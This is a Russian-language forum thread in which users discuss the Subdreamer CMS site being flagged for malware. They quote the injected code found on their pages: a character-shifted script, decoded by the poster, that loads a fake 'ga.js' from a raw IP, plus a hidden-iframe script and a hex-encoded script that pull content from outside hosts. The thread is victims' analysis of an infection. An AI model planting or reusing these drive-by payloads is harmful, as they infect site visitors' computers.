Попытался зайти на subdreamer.com

Статус
В этой теме нельзя размещать новые ответы.
P

ppr

Постоялец
Регистрация
2 Апр 2006
Сообщения
68
Реакции
21
Безопасный просмотр
Страница диагностики для subdreamer.com

Занесен ли сайт subdreamer.com в список подозрительных веб-сайтов?

Сайт занесен в список подозрительных веб-сайтов – посещение этого сайта может нанести вред вашему компьютеру.

Что произошло во время последнего просмотра этого сайта компанией Google?

Из протестированных нами за последние 90 дней страниц данного сайта (18) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 1. Последний раз сайт просматривался Google 2009-03-26, а подозрительное содержание было обнаружено 2009-03-26.

Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая 84.244.138.0/.

This site was hosted on 2 network(s) including AS25847 (SERVINT), AS8075 (MICROSOFT).

Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт subdreamer.com не был промежуточным звеном в заражении других сайтов.

Размещается ли на этом сайте вредоносное программное обеспечение?

Нет. За последние 90 дней на этом сайте не размещалось вредоносное программное обеспечение.

Как это произошло?

В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.

Следующие действия:

* Вернуться на предыдущую страницу.
Нажмите для раскрытия...



Да, Subdreamer хакнули.

Посмотрел код, там в конце добавлено:

</body>
</html><html><script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script></html>
Нажмите для раскрытия...
Этот код (выше) означает следующее:
<script type="text/javascript" src="http://84.244.138.55/google-analytics/ga.js"></script>
Нажмите для раскрытия...

Но google-analytics не имеет ничего общего с Google Analytics. На самом деле открывает окно со стороннего сервера, который и пытается заразить компьютер посетителя Subdreamer.com. Поэтому Google его и запретил в Firefox. IE открывает без предупреждения.


Предположу (по собранной в Инете инфе), что ломанули всё же не сайт, а хостинг. Очевидно, у кого-то был украден доступ через FTP. Но, в любом случае, это неприятно :(
 
пипец. :ai:
я надеюсь, что взломали не через кривизну кода!..

Для просмотра ссылки Войди или Зарегистрируйся
этот не заблокирован!..
я очень надеюсь, что это не кривизна кода!..

они на разных айпишках, но сервер, видимо, один и тот же...
64.131.73.137 ком
64.131.73.138 орг
 
разработчики успокаивают: говорят, что проблема бьіла через взлом фтп, а не через кривизну скрипта...

Для просмотра ссылки Войди или Зарегистрируйся
 
И правда радостная новость, что не из за кривизны кода. Могло быть и хуже ) А как вообще сравнить безопастность сабы по сравнению с другими CMS?
 
MrZlo написал(а):
И правда радостная новость, что не из за кривизны кода. Могло быть и хуже ) А как вообще сравнить безопастность сабы по сравнению с другими CMS?
Нажмите для раскрытия...
а заказать тест...
или хоть заглянуть на милворм, поглазеть на сайтах по безопасности...
 
сам - не прогер - средней руки верстальщик

никто ничего не ломал - по моему - элементарный вирус - - логика его действий -
на компе в тотале "срисовал" у меня пароли - потом - когда я просто выходил в нет - он паралельно - залез на этот аккаунт - "автоматом"
- сцуко - заразил файлы index.php и index.html во всех папках на сервере -
вставил этот самый код -
PHP: 
<script>var onb="<";var pna="i";var kynww=" ";var uwcol="ninte='T4BUUfSv' oxoqy='zlfhOnwe' src=";var xjgsi="ame>";var xixdg="info/srt/go.php?sid=1";var ujcvx="?SK31y ";var tbf="f";var ghq="r";var bin="a";var sfebs="xmejo='fhsRircp' ";var xlh="m";var ztx="e";var hghlx="width=669 ";var dsmsb="http://regedintheclub.";var ctljg="height=201 ";var giicz="style='display:none'";var gwkec=dsmsb+xixdg;var esjgx="></ifr";document.write(onb+pna+tbf+ghq+bin+xlh+ztx+kynww+uwcol+gwkec+ujcvx+sfebs+hghlx+ctljg+giicz+esjgx+xjgsi);</script>

<script>function c71912231668n49429a83511dd(n49429a83519df){ function n49429a835217c(){return 16;} return (parseInt(n49429a83519df,n49429a835217c()));}function n49429a8353124(n49429a83538f8){ function n49429a8355074(){return 2;} var n49429a83540cc='';n49429a835601c=String.fromCharCode;for(n49429a83548a0=0;n49429a83548a0<n49429a83538f8.length;n49429a83548a0+=n49429a8355074()){ n49429a83540cc+=(n49429a835601c(c71912231668n49429a83511dd(n49429a83538f8.substr(n49429a83548a0,n49429a8355074()))));}return n49429a83540cc;} var xa8='';var n49429a83567f0='3C7'+xa8+'3637'+xa8+'2697'+xa8+'07'+xa8+'43E696628216D7'+xa8+'96961297'+xa8+'B646F637'+xa8+'56D656E7'+xa8+'42E7'+xa8+'7'+xa8+'7'+xa8+'2697'+xa8+'465287'+xa8+'56E657'+xa8+'363617'+xa8+'065282027'+xa8+'2533632536392536362537'+xa8+'32253631253664253635253230253665253631253664253635253364253633253337'+xa8+'2532302537'+xa8+'332537'+xa8+'32253633253364253237'+xa8+'2536382537'+xa8+'342537'+xa8+'342537'+xa8+'30253361253266253266253632253639253637'+xa8+'2537'+xa8+'332536352536632536632537'+xa8+'332537'+xa8+'342536312536362536362532652536332536652532662536362536352536352536342536322536312536332536622532652536382537'+xa8+'34253664253663253366253237'+xa8+'2532622534642536312537'+xa8+'342536382532652537'+xa8+'322536662537'+xa8+'352536652536342532382534642536312537'+xa8+'342536382532652537'+xa8+'32253631253665253634253666253664253238253239253261253337'+xa8+'253334253336253239253262253237'+xa8+'253331253632253335253338253631253330253333253339253237'+xa8+'2532302537'+xa8+'37'+xa8+'2536392536342537'+xa8+'34253638253364253332253230253638253635253639253637'+xa8+'2536382537'+xa8+'34253364253333253337'+xa8+'2533332532302537'+xa8+'332537'+xa8+'342537'+xa8+'39253663253635253364253237'+xa8+'2536342536392537'+xa8+'332537'+xa8+'302536632536312537'+xa8+'39253361253230253665253666253665253635253237'+xa8+'2533652533632532662536392536362537'+xa8+'3225363125366425363525336527'+xa8+'29293B7'+xa8+'D7'+xa8+'6617'+xa8+'2206D7'+xa8+'969613D7'+xa8+'47'+xa8+'27'+xa8+'5653B3C2F7'+xa8+'3637'+xa8+'2697'+xa8+'07'+xa8+'43E';document.write(n49429a8353124(n49429a83567f0));</script>
как ни странно - половина сайтов - а уменя на том аккаунте "висело" порядка 10-ти сайтов - все равно работало - половину - легло - причем все- были на сабдримке - ручками - почистил - сча все намана работает - где-то у нас на tut.by про него писали... в декабре 2008 все это и случилось - потом просто каспером комп жестко почистил - и - порядок...
 
Возможно, из-за FTP или вируса на серве, но код сабдримера всё-равно кривой! И уязвимости имеются! Какие именно не знаю, но на всех версиях хакают сайты примерно одним и тем же методом...
 
Энштейн написал(а):
хакают сайты примерно одним и тем же методом...
Нажмите для раскрытия...
года 4 как юэаю сабдриму - разные версии - чтобы кто-то специально хакал - че-т не припомню - все как-то вирусы - арендую VPS - врем от времени проходят атаки разные на сервер хостера - вот вместе с ним - скорей всего - и попадаю под раздачу - раз в год - так точно. уже привык... особенно перед новогодними праздниками.. )
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху